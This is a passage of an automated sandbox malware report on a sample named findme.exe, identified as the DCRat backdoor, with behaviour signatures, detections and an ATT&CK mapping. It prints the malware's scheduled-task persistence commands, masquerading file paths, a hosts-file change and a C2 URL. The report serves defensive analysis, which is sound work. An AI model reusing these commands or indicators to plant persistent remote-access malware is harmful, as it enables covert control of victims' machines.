          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599780Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599653Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599539Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599417Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599281Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599171Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 599057Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598948Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598734Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598625Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598516Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598406Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598294Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598184Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 598071Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597959Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597712Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597608Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597496Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597390Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597280Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 597164Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596995Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596866Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: webnetdhcp.exe, 0000000A.00000002.1478477880.000000001D474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
          Source: webnetdhcp.exe, 0000000A.00000000.1278269582.00000000009C2000.00000002.00000001.01000000.0000000A.sdmp, findme.exe, WGNWJePMcpkvwPkbkGq.exe0.10.dr, WGNWJePMcpkvwPkbkGq.exe1.10.dr, WGNWJePMcpkvwPkbkGq.exe.10.dr, WGNWJePMcpkvwPkbkGq.exe4.10.dr, WmiPrvSE.exe.10.dr, SearchApp.exe.10.drBinary or memory string: qEmuW
          Source: findme.exe, 00000000.00000003.1253378099.0000000002CC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
          Source: wscript.exe, 00000002.00000003.1277958730.00000000034A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: webnetdhcp.exe, 0000000A.00000002.1471618002.000000001BD45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
          Source: webnetdhcp.exe, 0000000A.00000002.1478477880.000000001D474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: webnetdhcp.exe, 0000000A.00000002.1471618002.000000001BCF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\findme.exeAPI call chain: ExitProcess graph end nodegraph_0-23418
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004E866F
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E753D mov eax, dword ptr fs:[00000030h]0_2_004E753D
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004EB710 GetProcessHeap,0_2_004EB710
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DF063 SetUnhandledExceptionFilter,0_2_004DF063
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004DF22B
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004E866F
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004DEF05
          Source: C:\runtimebrokerHost\webnetdhcp.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Modifies the hosts file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\findme.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /fJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DED5B cpuid 0_2_004DED5B
          Source: C:\Users\user\Desktop\findme.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_004DA63C
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\runtimebrokerHost\webnetdhcp.exe VolumeInformationJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CACF5 GetVersionExW,0_2_004CACF5
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies the hosts file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected DCRat
          Source: Yara matchFile source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: webnetdhcp.exe PID: 7384, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected DCRat
          Source: Yara matchFile source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: webnetdhcp.exe PID: 7384, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information11
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		11
          Scripting          		1
          DLL Side-Loading          		1
          File and Directory Permissions Modification          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		1
          DLL Side-Loading          		11
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Clipboard Data          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		11
          Scheduled Task/Job          		11
          Scheduled Task/Job          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager37
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts11
          Scheduled Task/Job          		Login HookLogin Hook2
          Obfuscated Files or Information          		NTDS221
          Security Software Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing          		LSA Secrets1
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials31
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items223
          Masquerading          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589982 Sample: findme.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 45 ip-api.com 2->45 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 12 other signatures 2->55 10 findme.exe 3 6 2->10         started        signatures3 process4 file5 41 C:\runtimebrokerHost\webnetdhcp.exe, PE32 10->41 dropped 43 C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe, data 10->43 dropped 13 wscript.exe 1 10->13         started        process6 signatures7 65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->65 16 cmd.exe 1 13->16         started        process8 process9 18 webnetdhcp.exe 16 32 16->18         started        23 conhost.exe 16->23         started        dnsIp10 47 ip-api.com 208.95.112.1, 49699, 49700, 49702 TUT-ASUS United States 18->47 33 C:\runtimebrokerHost\lsass.exe, PE32 18->33 dropped 35 C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe, PE32 18->35 dropped 37 C:\Windows\...\WGNWJePMcpkvwPkbkGq.exe, PE32 18->37 dropped 39 12 other malicious files 18->39 dropped 57 Antivirus detection for dropped file 18->57 59 Multi AV Scanner detection for dropped file 18->59 61 Machine Learning detection for dropped file 18->61 63 5 other signatures 18->63 25 schtasks.exe 18->25         started        27 schtasks.exe 18->27         started        29 schtasks.exe 18->29         started        31 2 other processes 18->31 file11 signatures12 process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          findme.exe69%VirustotalBrowse
          findme.exe66%ReversingLabsByteCode-MSIL.Trojan.Uztuby
          findme.exe100%AviraVBS/Runner.VPG
          findme.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Users\jones\AppData\Local\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files\7-Zip\SearchApp.exe100%AviraHEUR/AGEN.1323984
          C:\runtimebrokerHost\webnetdhcp.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\runtimebrokerHost\lsass.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe100%AviraVBS/Runner.VPG
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Users\jones\AppData\Local\WmiPrvSE.exe100%Joe Sandbox ML
          C:\Program Files\7-Zip\SearchApp.exe100%Joe Sandbox ML
          C:\runtimebrokerHost\webnetdhcp.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\runtimebrokerHost\lsass.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Google\RuntimeBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Google\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Program Files\7-Zip\SearchApp.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Recovery\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Recovery\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Users\jones\AppData\Local\WmiPrvSE.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\runtimebrokerHost\lsass.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
          C:\runtimebrokerHost\webnetdhcp.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ip-api.com
          		208.95.112.1
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnbtrue
            • Avira URL Cloud: malware
            		unknown
            http://ip-api.com/line/?fields=hostingfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewebnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://ip-api.comwebnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  208.95.112.1
                  		ip-api.comUnited States
                  		53334TUT-ASUSfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1589982
                  Start date and time:2025-01-13 12:49:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 27s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:42
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:findme.exe
                  Detection:MAL
                  Classification:mal100.troj.adwa.evad.winEXE@30/33@3/1
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                  • Excluded domains from analysis (whitelisted): 734537cm.nyashtyan.top, otelrules.azureedge.net, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, time.windows.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target webnetdhcp.exe, PID 7384 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  06:50:06API Interceptor34x Sleep call for process: webnetdhcp.exe modified
                  12:50:08Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
                  12:50:08Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
                  12:50:10Task SchedulerRun new task: lsass path: "C:\runtimebrokerHost\lsass.exe"
                  12:50:10Task SchedulerRun new task: lsassl path: "C:\runtimebrokerHost\lsass.exe"
                  12:50:10Task SchedulerRun new task: SearchApp path: "C:\Program Files\7-Zip\SearchApp.exe"
                  12:50:10Task SchedulerRun new task: SearchAppS path: "C:\Program Files\7-Zip\SearchApp.exe"
                  12:50:10Task SchedulerRun new task: WGNWJePMcpkvwPkbkGq path: "C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe"
                  12:50:11Task SchedulerRun new task: WGNWJePMcpkvwPkbkGqW path: "C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe"
                  12:50:11Task SchedulerRun new task: WmiPrvSE path: "C:\Users\jones\AppData\Local\WmiPrvSE.exe"
                  12:50:11Task SchedulerRun new task: WmiPrvSEW path: "C:\Users\jones\AppData\Local\WmiPrvSE.exe"

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                  • ip-api.com/json/?fields=61439
                  Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                  • ip-api.com/json
                  resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                  • ip-api.com/json/?fields=225545
                  F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                  • ip-api.com/json/
                  DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                  • ip-api.com/line/?fields=hosting
                  tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ip-api.comtasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                  • 208.95.112.1
                  resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                  • 208.95.112.1
                  F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                  • 208.95.112.1
                  DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                  • 208.95.112.1
                  tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 208.95.112.1

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  TUT-ASUStasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                  • 208.95.112.1
                  resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                  • 208.95.112.1
                  F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
